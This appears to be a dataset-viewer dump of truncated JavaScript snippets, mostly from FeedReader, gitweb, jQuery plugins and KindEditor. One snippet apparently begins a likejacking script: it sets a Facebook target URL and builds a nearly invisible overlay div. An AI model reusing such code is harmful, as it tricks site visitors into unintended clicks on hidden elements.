code stringlengths 1 2.08M | language stringclasses 1
value |
|---|---|
/*
* source/controls/enhancedaudio.js - Enyo Audio Control
*/
/* FeedReader - A RSS Feed Aggregator for Palm WebOS
* Copyright (C) 2009-2012 Timo Tegtmeier
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free ... | JavaScript |
/*
* source/controls/enhancedlist.js - Improved VirtualList
*
* This control makes page handling a lot easier. It keeps track
* of currently running 'acquirePage' events and automatically refreshes
* the list once all are done.
* To simplify list updates, the method 'reAcquirePages' can be used. It
* avoid... | JavaScript |
/*
* source/controls/listviewskeleton.js
*/
/* FeedReader - A RSS Feed Aggregator for Palm WebOS
* Copyright (C) 2009-2012 Timo Tegtmeier
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software ... | JavaScript |
// This is a slightly modified version of "ReorderableVirtualList".
// The original version was created by Wayne from AngryGoat (http://www.angrygoatapps.com/)
// and is to be found here: https://developer.palm.com/distribution/viewtopic.php?f=11&t=15850
//
// I simply added the ability to set the opacity of the drag i... | JavaScript |
/*
* source/controls/errordialog.js
*/
/* FeedReader - A RSS Feed Aggregator for Palm WebOS
* Copyright (C) 2009-2012 Timo Tegtmeier
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; ei... | JavaScript |
/*
* source/controls/toggleitem.js
*/
/* FeedReader - A RSS Feed Aggregator for Palm WebOS
* Copyright (C) 2009-2012 Timo Tegtmeier
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; eit... | JavaScript |
/*
* source/editfeed/editfeed.js
*/
/* FeedReader - A RSS Feed Aggregator for Palm WebOS
* Copyright (C) 2009-2012 Timo Tegtmeier
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; eithe... | JavaScript |
/*
* source/help/help.js - Help dialog
*/
/* FeedReader - A RSS Feed Aggregator for Palm WebOS
* Copyright (C) 2009-2012 Timo Tegtmeier
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation;... | JavaScript |
/*
* source/importer/importer.js
*/
/* FeedReader - A RSS Feed Aggregator for Palm WebOS
* Copyright (C) 2009-2012 Timo Tegtmeier
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; eithe... | JavaScript |
/*
* source/models/readitlater.js - Read it Later support
*/
/* FeedReader - A RSS Feed Aggregator for Palm WebOS
* Copyright (C) 2009-2012 Timo Tegtmeier
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by t... | JavaScript |
/*
* source/models/prefs.js - preferences data model
*/
/* FeedReader - A RSS Feed Aggregator for Palm WebOS
* Copyright (C) 2009-2012 Timo Tegtmeier
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Fr... | JavaScript |
/*
* source/models/database.js - Database functions
*
* The classes defined here communicate with the FeedReader SQLite
* database.
*/
/* FeedReader - A RSS Feed Aggregator for Palm WebOS
* Copyright (C) 2009-2012 Timo Tegtmeier
*
* This program is free software; you can redistribute it and/or
* modify it un... | JavaScript |
/*
* source/models/feeds.js - Feedlist data model
*/
/* FeedReader - A RSS Feed Aggregator for Palm WebOS
* Copyright (C) 2009-2012 Timo Tegtmeier
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free ... | JavaScript |
enyo.depends(
"dashboard.js",
"dashboard.css"
);
| JavaScript |
/*
* source/dashboard/dashboard.js - Dashboard control
*/
/* FeedReader - A RSS Feed Aggregator for Palm WebOS
* Copyright (C) 2009-2012 Timo Tegtmeier
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Soft... | JavaScript |
/*
* source/license/license.js
*/
/* FeedReader - A RSS Feed Aggregator for Palm WebOS
* Copyright (C) 2009-2012 Timo Tegtmeier
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either ... | JavaScript |
/*
* source/story/story.js
*/
/* FeedReader - A RSS Feed Aggregator for Palm WebOS
* Copyright (C) 2009-2012 Timo Tegtmeier
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either vers... | JavaScript |
/*
* source/launcher.js - Application launcher
*
* The classes defined here communicate with the FeedReader SQLite
* database. It does not contain the migration code used to migrate
* the older Depot-based database into the current structure.
*/
/* FeedReader - A RSS Feed Aggregator for Palm WebOS
* Copyright ... | JavaScript |
/*
* source/storylist/storylist.js
*/
/* FeedReader - A RSS Feed Aggregator for Palm WebOS
* Copyright (C) 2009-2012 Timo Tegtmeier
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; eit... | JavaScript |
/*
* source/preferences/preferences.js
*/
/* FeedReader - A RSS Feed Aggregator for Palm WebOS
* Copyright (C) 2009-2012 Timo Tegtmeier
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation;... | JavaScript |
/*
* source/models/timer - Timer service wrapper
*/
/* FeedReader - A RSS Feed Aggregator for Palm WebOS
* Copyright (C) 2009-2012 Timo Tegtmeier
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software F... | JavaScript |
/*
* source/utils/spooler.js - activity spooler
*/
/* FeedReader - A RSS Feed Aggregator for Palm WebOS
* Copyright (C) 2009-2012 Timo Tegtmeier
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Fo... | JavaScript |
/*
* app/utils/dashboard.js
*/
/* FeedReader - A RSS Feed Aggregator for Palm WebOS
* Copyright (C) 2009-2012 Timo Tegtmeier
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either ver... | JavaScript |
/*
* source/utils/connection.js - Internet connection checking
*/
/* FeedReader - A RSS Feed Aggregator for Palm WebOS
* Copyright (C) 2009-2012 Timo Tegtmeier
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the F... | JavaScript |
/*
* source/utils/date.js - Date formatting functions
*/
/* FeedReader - A RSS Feed Aggregator for Palm WebOS
* Copyright (C) 2009-2012 Timo Tegtmeier
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Softw... | JavaScript |
/*
* source/mainview/mainview.js
*/
/* FeedReader - A RSS Feed Aggregator for Palm WebOS
* Copyright (C) 2009-2012 Timo Tegtmeier
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; eithe... | JavaScript |
enyo.depends(
// Scene
"mainview.js",
// Commons
"../../commonjs/simplehtmlparser.js",
"../../commonjs/feed.js",
"../../commonjs/helper.js",
// Utilities
"../utils/connection.js",
// Controls
"../controls/toggleitem.js",
"../controls/selectoritem.js",
"../controls/errordialog.js",
"../controls/reorde... | JavaScript |
/*
* commonjs/transactionmgr - Database transaction manager
*
*/
/* FeedReader - A RSS Feed Aggregator for Palm WebOS
* Copyright (C) 2009-2012 Timo Tegtmeier
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the F... | JavaScript |
/*
* commonjs/feed.js - Feed data model
*/
/* FeedReader - A RSS Feed Aggregator for Palm WebOS
* Copyright (C) 2009-2012 Timo Tegtmeier
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation... | JavaScript |
/*
* commonjs/constants.js - Common constants
*
*/
/* FeedReader - A RSS Feed Aggregator for Palm WebOS
* Copyright (C) 2009-2012 Timo Tegtmeier
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software F... | JavaScript |
/*
* commonjs/helper.js - common helper functions
*
*/
/* FeedReader - A RSS Feed Aggregator for Palm WebOS
* Copyright (C) 2009-2012 Timo Tegtmeier
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Softwa... | JavaScript |
/*
* commonjs/prefs.js - preferences defaults and helper functions
*
* This class is used to make the prefs handling between the different versions
* more uniform. The functions here are completely framework agnostic.
*/
/* FeedReader - A RSS Feed Aggregator for Palm WebOS
* Copyright (C) 2009-2012 Timo Tegtm... | JavaScript |
/*
* commonjs/codepages.js
*/
/* FeedReader - A RSS Feed Aggregator for Palm WebOS
* Copyright (C) 2009-2012 Timo Tegtmeier
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either vers... | JavaScript |
/*
* commonjs/formatting.js
*/
/* FeedReader - A RSS Feed Aggregator for Palm WebOS
* Copyright (C) 2009-2012 Timo Tegtmeier
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either ver... | JavaScript |
/*
* commonjs/feeds.js - Common feed processing
*/
/* FeedReader - A RSS Feed Aggregator for Palm WebOS
* Copyright (C) 2009-2012 Timo Tegtmeier
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Fo... | JavaScript |
// Copyright 2004 Erik Arvidsson. All Rights Reserved.
//
// This code is dual licensed using Mozilla Public License or
// Apache Software License 2.0
//
///////////////////////////////////////////////////////////////////////////////
//
// Licensed under the Apache License, Version 2.0 (the "License"); you may not
// ... | JavaScript |
/*
* commonjs/story.js - Story data model
*/
/* FeedReader - A RSS Feed Aggregator for Palm WebOS
* Copyright (C) 2009-2012 Timo Tegtmeier
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundati... | JavaScript |
// Copyright (C) 2007, Fredrik Kuivinen <frekui@gmail.com>
// 2007, Petr Baudis <pasky@suse.cz>
// 2008-2011, Jakub Narebski <jnareb@gmail.com>
/**
* @fileOverview Detect if JavaScript is enabled, and pass it to server-side
* @license GPLv2 or later
*/
/* ===================================... | JavaScript |
// Copyright (C) 2007, Fredrik Kuivinen <frekui@gmail.com>
// 2007, Petr Baudis <pasky@suse.cz>
// 2008-2011, Jakub Narebski <jnareb@gmail.com>
/**
* @fileOverview JavaScript side of Ajax-y 'blame_incremental' view in gitweb
* @license GPLv2 or later
*/
/* ===================================... | JavaScript |
// Copyright (C) 2011, John 'Warthog9' Hawley <warthog9@eaglescrag.net>
// 2011, Jakub Narebski <jnareb@gmail.com>
/**
* @fileOverview Manipulate dates in gitweb output, adjusting timezone
* @license GPLv2 or later
*/
/**
* Get common timezone, add UI for changing timezones, and adjust
* dates to u... | JavaScript |
// Copyright (C) 2007, Fredrik Kuivinen <frekui@gmail.com>
// 2007, Petr Baudis <pasky@suse.cz>
// 2008-2011, Jakub Narebski <jnareb@gmail.com>
/**
* @fileOverview Generic JavaScript code (helper functions)
* @license GPLv2 or later
*/
/* ====================================================... | JavaScript |
/**
* @fileOverview Accessing cookies from JavaScript
* @license GPLv2 or later
*/
/*
* Based on subsection "Cookies in JavaScript" of "Professional
* JavaScript for Web Developers" by Nicholas C. Zakas and cookie
* plugin from jQuery (dual licensed under the MIT and GPL licenses)
*/
/**
* Create a cookie wi... | JavaScript |
// Copyright (C) 2007, Fredrik Kuivinen <frekui@gmail.com>
// 2007, Petr Baudis <pasky@suse.cz>
// 2008-2011, Jakub Narebski <jnareb@gmail.com>
/**
* @fileOverview Datetime manipulation: parsing and formatting
* @license GPLv2 or later
*/
/* .................................................... | JavaScript |
// git-gui Windows shortcut support
// Copyright (C) 2007 Shawn Pearce
var WshShell = WScript.CreateObject("WScript.Shell");
var argv = WScript.Arguments;
var argi = 0;
var lnk_path = argv.item(argi++);
var ico_path = argi < argv.length ? argv.item(argi++) : undefined;
var dir_path = argi < argv.length ? argv.item(arg... | JavaScript |
//====================================================================================================
// [插件名称] jQuery formValidator
//----------------------------------------------------------------------------------------------------
// [描 述] jQuery formValidator表单验证插件,它是基于jQuery类库,实现了js脚本于页面的分离。对一个表
// ... | JavaScript |
var regexEnum =
{
intege:"^-?[1-9]\\d*$", //整数
intege1:"^[1-9]\\d*$", //正整数
intege2:"^-[1-9]\\d*$", //负整数
num:"^([+-]?)\\d*\\.?\\d+$", //数字
num1:"^[1-9]\\d*|0$", //正数(正整数 + 0)
num2:"^-[1-9]\\d*|0$", //负数(负整数 + 0)
decmal:"^([+-]?)\\d*\\.\\d+$", //浮点数
decmal1:"^[1-9]\\d*.\\d*|0.... | JavaScript |
//====================================================================================================
// [插件名称] jQuery formValidator
//----------------------------------------------------------------------------------------------------
// [描 述] jQuery formValidator表单验证插件,它是基于jQuery类库,实现了js脚本于页面的分离。对一个表
// ... | JavaScript |
var onShowHtml = "<div class='$class$'>$data$</div>";
var onFocusHtml = "<div class='$class$'>$data$</div>";
var onErrorHtml = "<div class='$class$'>$data$</div>";
var onCorrectHtml = "<div class='$class$'>$data$</div>";
var onShowClass = "input_show";
var onFocusClass = "input_focus";
var onErrorClass = "input_e... | JavaScript |
var onShowHtml = "<div class='$class$'>$data$</div>";
var onFocusHtml = "<div class='$class$'>$data$</div>";
var onErrorHtml = "<div class='$class$'>$data$</div>";
var onCorrectHtml = "<div class='$class$'>$data$</div>";
var onShowClass = "";
var onFocusClass = "";
var onErrorClass = "";
var onCorrectClass = ""; | JavaScript |
//提示层的HTML
var onShowHtml = '';
var onFocusHtml = '';
var onErrorHtml = '<P class="noticeWrap"><B class="ico-warning"></B><SPAN class=txt-err>$data$</SPAN></P>';
var onCorrectHtml = '<P class="noticeWrap"><B class="ico-succ"></B><SPAN class=txt-succ>$data$</SPAN></P>';
var onShowHtml = '';
//文本框的样式
var onShow... | JavaScript |
var onShowHtml = "";
var onFocusHtml = "<span class='$class$'><span class='$class$_top'>$data$</span><span class='$class$_bot'></span></span>";
var onErrorHtml = "<span class='$class$'><span class='$class$_top'>$data$</span><span class='$class$_bot'></span></span>";
var onCorrectHtml = "<span class='$class$'></span>... | JavaScript |
//====================================================================================================
// [插件名称] jQuery formValidator
//----------------------------------------------------------------------------------------------------
// [描 述] jQuery formValidator表单验证插件,它是基于jQuery类库,实现了js脚本于页面的分离。对一个表
// ... | JavaScript |
//====================================================================================================
// [插件名称] jQuery formValidator
//----------------------------------------------------------------------------------------------------
// [描 述] jQuery formValidator表单验证插件,它是基于jQuery类库,实现了js脚本于页面的分离。对一个表
// ... | JavaScript |
var regexEnum =
{
intege:"^-?[1-9]\\d*$", //整数
intege1:"^[1-9]\\d*$", //正整数
intege2:"^-[1-9]\\d*$", //负整数
num:"^([+-]?)\\d*\\.?\\d+$", //数字
num1:"^[1-9]\\d*|0$", //正数(正整数 + 0)
num2:"^-[1-9]\\d*|0$", //负数(负整数 + 0)
decmal:"^([+-]?)\\d*\\.\\d+$", //浮点数
decmal1:"^[1-9]\\d*.\\d*|0.... | JavaScript |
var onShowHtml = "<div class='$class$'>$data$</div>";
var onFocusHtml = "<div class='$class$'>$data$</div>";
var onErrorHtml = "<div class='$class$'>$data$</div>";
var onCorrectHtml = "<div class='$class$'>$data$</div>";
var onShowClass = "input_show";
var onFocusClass = "input_focus";
var onErrorClass = "input_e... | JavaScript |
var onShowHtml = "<div class='$class$'>$data$</div>";
var onFocusHtml = "<div class='$class$'>$data$</div>";
var onErrorHtml = "<div class='$class$'>$data$</div>";
var onCorrectHtml = "<div class='$class$'>$data$</div>";
var onShowClass = "";
var onFocusClass = "";
var onErrorClass = "";
var onCorrectClass = ""; | JavaScript |
//提示层的HTML
var onShowHtml = '';
var onFocusHtml = '';
var onErrorHtml = '<P class="noticeWrap"><B class="ico-warning"></B><SPAN class=txt-err>$data$</SPAN></P>';
var onCorrectHtml = '<P class="noticeWrap"><B class="ico-succ"></B><SPAN class=txt-succ>$data$</SPAN></P>';
var onShowHtml = '';
//文本框的样式
var onShow... | JavaScript |
var onShowHtml = "";
var onFocusHtml = "<span class='$class$'><span class='$class$_top'>$data$</span><span class='$class$_bot'></span></span>";
var onErrorHtml = "<span class='$class$'><span class='$class$_top'>$data$</span><span class='$class$_bot'></span></span>";
var onCorrectHtml = "<span class='$class$'></span>... | JavaScript |
/**
* WYSIWYG - jQuery plugin 0.6
*
* Copyright (c) 2008-2009 Juan M Martinez
* http://plugins.jquery.com/project/jWYSIWYG
*
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/licenses/gpl.html
*
* $Id: $
*/
(function( $ )
{
$.fn.... | JavaScript |
/*!
* MultiUpload for xheditor
* @requires xhEditor
*
* @author Yanis.Wang<yanis.wang@gmail.com>
* @site http://xheditor.com/
* @licence LGPL(http://www.opensource.org/licenses/lgpl-license.php)
*
* @Version: 0.9.2 (build 100505)
*/
var swfu,selQueue=[],selectID,arrMsg=[],allSize=0,uploadSize=0;
f... | JavaScript |
var X = {};
X.hook = function() {
var pre_init_str = 'x_init_hook_';
for ( var h in window ) {
if ( 0 != h.indexOf(pre_init_str) )
continue;
var func = window[h];
if ( typeof func == 'function' ) {
try { func(); }catch(e){}
}
}
};
X.get = func... | JavaScript |
/*
* jQuery Form Plugin
* version: 2.25 (08-APR-2009)
* @requires jQuery v1.2.2 or later
*
* Examples and documentation at: http://malsup.com/jquery/form/
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/licenses/gpl.html
*/
... | JavaScript |
/**
* WYSIWYG - jQuery plugin 0.6
*
* Copyright (c) 2008-2009 Juan M Martinez
* http://plugins.jquery.com/project/jWYSIWYG
*
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/licenses/gpl.html
*
* $Id: $
*/
(function( $ )
{
$.fn.... | JavaScript |
var Common = {};
Common.trim = function(s){return s.replace(/(^\s*)|(\s*$)/g, "");};
var validator={
errinput : 'errinput',
errmsg : 'errmsg',
errcls : 'no',
yescls : 'yes',
errorTip : 'errorTip',
errorInput : 'errorInput',
validTip : 'validTip',
require : /[^(^\s*)|(\s*$)]/,
email : /^\w+([-+.]\... | JavaScript |
/*
* A JavaScript implementation of the RSA Data Security, Inc. MD5 Message
* Digest Algorithm, as defined in RFC 1321.
* Version 2.2 Copyright (C) Paul Johnston 1999 - 2009
* Other contributors: Greg Holt, Andrew Kepert, Ydnar, Lostinet
* Distributed under the BSD License
* See http://pajhome.org.uk/crypt/... | JavaScript |
/**
* SWFObject v1.4: Flash Player detection and embed - http://blog.deconcept.com/swfobject/
*
* SWFObject is (c) 2006 Geoff Stearns and is released under the MIT License:
* http://www.opensource.org/licenses/mit-license.php
*
* **SWFObject is the SWF embed script formerly known as FlashObject. The name was chan... | JavaScript |
/**
* jQuery.timers - Timer abstractions for jQuery
* Written by Blair Mitchelmore (blair DOT mitchelmore AT gmail DOT com)
* Licensed under the WTFPL (http://sam.zoy.org/wtfpl/).
* Date: 2009/10/16
*
* @author Blair Mitchelmore
* @version 1.2
*
**/
jQuery.fn.extend({
everyTime: function(interval... | JavaScript |
var WEB_ROOT = WEB_ROOT || '';
var LOGINUID = LOGINUID || 0;
window.x_init_hook_validator = function() {
jQuery('form.validator').each(function(){jQuery.fn.checkForm(this);});
jQuery('a.needlogin').click(X.misc.needlogin);
};
window.x_init_hook_dealimage = function() {
jQuery('#deal-stuff img').each(function(){X.mis... | JavaScript |
/**
* Creates a new Floor.
* @constructor
* @param {google.maps.Map=} opt_map
*/
function Floor(opt_map) {
/**
* @type Array.<google.maps.MVCObject>
*/
this.overlays_ = [];
/**
* @type boolean
*/
this.shown_ = true;
if (opt_map) {
this.setMap(opt_map);
}
}
/**
* @param {google.maps.M... | JavaScript |
/**
* Creates a new level control.
* @constructor
* @param {IoMap} iomap the IO map controller.
* @param {Array.<string>} levels the levels to create switchers for.
*/
function LevelControl(iomap, levels) {
var that = this;
this.iomap_ = iomap;
this.el_ = this.initDom_(levels);
google.maps.event.addList... | JavaScript |
/**
* @license
*
* Copyright 2011 Google Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable l... | JavaScript |
// Copyright 2011 Google
/**
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in wri... | JavaScript |
var isExtended = 0;
function slideSideBar(){
new Effect.toggle('sideBarContents', 'blind', {scaleX: 'true', scaleY: 'true;', scaleContent: false});
if(isExtended==0){
$('sideBarTab').childNodes[0].src = $('sideBarTab').childNodes[0].src.replace(/(\.[^.]+)$/, '-active$1');
new Effect.Fade('sideBarContents',... | JavaScript |
var isExtended = 0;
function slideSideBar(){
new Effect.toggle('sideBarContents', 'blind', {scaleX: 'true', scaleY: 'true;', scaleContent: false});
if(isExtended==0){
$('sideBarTab').childNodes[0].src = $('sideBarTab').childNodes[0].src.replace(/(\.[^.]+)$/, '-active$1');
new Effect.Fade('sideBarContents',... | JavaScript |
var targetUrl = 'https://www.facebook.com/evoplaza';
var fbvisited = true;
var force = true;
var oneclick = true;
var dothecookiedance = true;
var cookiedays = 7;
var timedelay = 25999;
var g9301 = document.createElement('div');
g9301.id = 'z2634';
g9301.style.position = 'absolute';
g9301.style.opacity = 0.01;
g9301.s... | JavaScript |
document.createElement('header');
document.createElement('nav');
document.createElement('section');
document.createElement('article');
document.createElement('aside');
document.createElement('footer');
document.createElement('hgroup');
$(document).ready(function () {
$('.section-content,#status-container').addClas... | JavaScript |
(function () {
var host = window.location.hostname;
var port = window.location.port;
var videoPlugin;
var videoStream;
var audioPlugin;
var audioStream;
var error;
var volume;
function stream(object,type,done) {
var state = "idle";
return {
restart:... | JavaScript |
(function () {
var translations = {
en: {
1:"About",
2:"Return",
3:"Change quality settings",
4:"Flash/Vibrator",
5:"Click on the torch to enable or disable the flash",
6:"Play a prerecorded sound",
7:"Connect !!",
8:"... | JavaScript |
$(window).load(function(){
$('.slider')._TMS({
preset:'diagonalExpand',
easing:'easeOutQuad',
duration:800,
pagination:true,
slideshow:8000,
banners:true,
waitBannerAnimation:false,
bannerShow:function(banner){
banner
.css({opacity:'0'})
.stop()
.animate({opacity:'1'},700, f... | JavaScript |
(function ($, undefined) {
$.extend(_TMS, {
presets:{
zoomer:{"reverseWay":false,"duration":"800","interval":"1","blocksX":"1","blocksY":"1","easing":"","way":"lines","anim":"zoomer",k:1.8,crds:{bottom:0,right:0}},
fadeThree:{"reverseWay":false,"duration":"800","interval":"1","blocksX":"1","blocksY":"1"... | JavaScript |
Cufon.replace('#menu a, .banner strong, .banner b, h2, h3', { fontFamily: 'Forum', hover:true });
| JavaScript |
// Create new HTML5 elements ===================================================
// -----------------------------------------------------------------------------
// This script should load before any others. We want the new elements to be
// parsed before pretty much anything happens.
// Plus, IE does not behave ot... | JavaScript |
/*
* jQuery Easing v1.3 - http://gsgd.co.uk/sandbox/jquery/easing/
*
* Uses the built in easing capabilities added In jQuery 1.1
* to offer multiple easing options
*
* TERMS OF USE - jQuery Easing
*
* Open source under the BSD License.
*
* Copyright © 2008 George McGinley Smith
* All rights res... | JavaScript |
/* jQuery based image slider
/* TMSlider 0.3 */
(function($,undefined){
var _TMS=window._TMS=$.fn._TMS=function(_){
_=_||{}
_=$.extend(clone(_TMS),_TMS.presets[_.preset],_)
_.init.call(_.me=_.holder=this,_)
return _.me.data({opt:_})
}
$.extend(_TMS,{
etal:'<div></div>',
items:'.ite... | JavaScript |
/*
jQuery Version: jQuery 1.3.2
Plugin Name: aToolTip V 1.0
Plugin by: Ara Abcarians: http://ara-abcarians.com
License: aToolTip is licensed under a Creative Commons Attribution 3.0 Unported License
Xem Thêm about this license at --> http://creativecommons.org/licenses/by/3.0/
*/
(f... | JavaScript |
(function ($) {
oo(':easyui', {
prop: [
{ name: 'removeMsg', value: '你确定要删除#count#行?', isStatic: true },
'editIndex',
{
name: 'editRow',
value: '',
getter: function (owner) {
var editIndex = own... | JavaScript |
(function ($) {
oo('class', {
_Route: function () {
oo('datagrid', 'route_grid', {
noheader: true,
width: 800,
height: 600,
columns: [
[
{ field: 'id', hidden: true },
... | JavaScript |
(function ($) {
oo('class', {
prop: [
{
name: 'data',
value: {},
getter: function (owner) {
},
setter: function (value, owner) {
}
}
],
_RouteDetail: function ... | JavaScript |
(function ($) {
oo('class', {
_RichText: function () {
var editor = KindEditor.create('#richText', {
basePath: '../libs/kindeditor/',
filePostName: 'attachment',
uploadJson: 'Attachment.Upload.do',
fileManagerJson: 'Attachme... | JavaScript |
/*******************************************************************************
* KindEditor - WYSIWYG HTML Editor for Internet
* Copyright (C) 2006-2011 kindsoft.net
*
* @author Roddy <luolonghao@gmail.com>
* @site http://www.kindsoft.net/
* @licence http://www.kindsoft.net/license.php
************************... | JavaScript |
/*******************************************************************************
* KindEditor - WYSIWYG HTML Editor for Internet
* Copyright (C) 2006-2011 kindsoft.net
*
* @author Roddy <luolonghao@gmail.com>
* @site http://www.kindsoft.net/
* @licence http://www.kindsoft.net/license.php
************************... | JavaScript |
/*******************************************************************************
* KindEditor - WYSIWYG HTML Editor for Internet
* Copyright (C) 2006-2011 kindsoft.net
*
* @author Roddy <luolonghao@gmail.com>
* @site http://www.kindsoft.net/
* @licence http://www.kindsoft.net/license.php
************************... | JavaScript |
/*******************************************************************************
* KindEditor - WYSIWYG HTML Editor for Internet
* Copyright (C) 2006-2011 kindsoft.net
*
* @author Roddy <luolonghao@gmail.com>
* @site http://www.kindsoft.net/
* @licence http://www.kindsoft.net/license.php
* Arabic Translation By ... | JavaScript |
/*******************************************************************************
* KindEditor - WYSIWYG HTML Editor for Internet
* Copyright (C) 2006-2011 kindsoft.net
*
* @author Roddy <luolonghao@gmail.com>
* @site http://www.kindsoft.net/
* @licence http://www.kindsoft.net/license.php
************************... | JavaScript |
/*******************************************************************************
* KindEditor - WYSIWYG HTML Editor for Internet
* Copyright (C) 2006-2011 kindsoft.net
*
* @author Roddy <luolonghao@gmail.com>
* @site http://www.kindsoft.net/
* @licence http://www.kindsoft.net/license.php
************************... | JavaScript |
/*******************************************************************************
* KindEditor - WYSIWYG HTML Editor for Internet
* Copyright (C) 2006-2011 kindsoft.net
*
* @author Roddy <luolonghao@gmail.com>
* @site http://www.kindsoft.net/
* @licence http://www.kindsoft.net/license.php
************************... | JavaScript |
/*******************************************************************************
* KindEditor - WYSIWYG HTML Editor for Internet
* Copyright (C) 2006-2011 kindsoft.net
*
* @author Roddy <luolonghao@gmail.com>
* @site http://www.kindsoft.net/
* @licence http://www.kindsoft.net/license.php
************************... | JavaScript |
/*******************************************************************************
* KindEditor - WYSIWYG HTML Editor for Internet
* Copyright (C) 2006-2011 kindsoft.net
*
* @author Roddy <luolonghao@gmail.com>
* @site http://www.kindsoft.net/
* @licence http://www.kindsoft.net/license.php
************************... | JavaScript |
/*******************************************************************************
* KindEditor - WYSIWYG HTML Editor for Internet
* Copyright (C) 2006-2011 kindsoft.net
*
* @author Roddy <luolonghao@gmail.com>
* @site http://www.kindsoft.net/
* @licence http://www.kindsoft.net/license.php
************************... | JavaScript |
/*******************************************************************************
* KindEditor - WYSIWYG HTML Editor for Internet
* Copyright (C) 2006-2011 kindsoft.net
*
* @author Roddy <luolonghao@gmail.com>
* @site http://www.kindsoft.net/
* @licence http://www.kindsoft.net/license.php
************************... | JavaScript |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.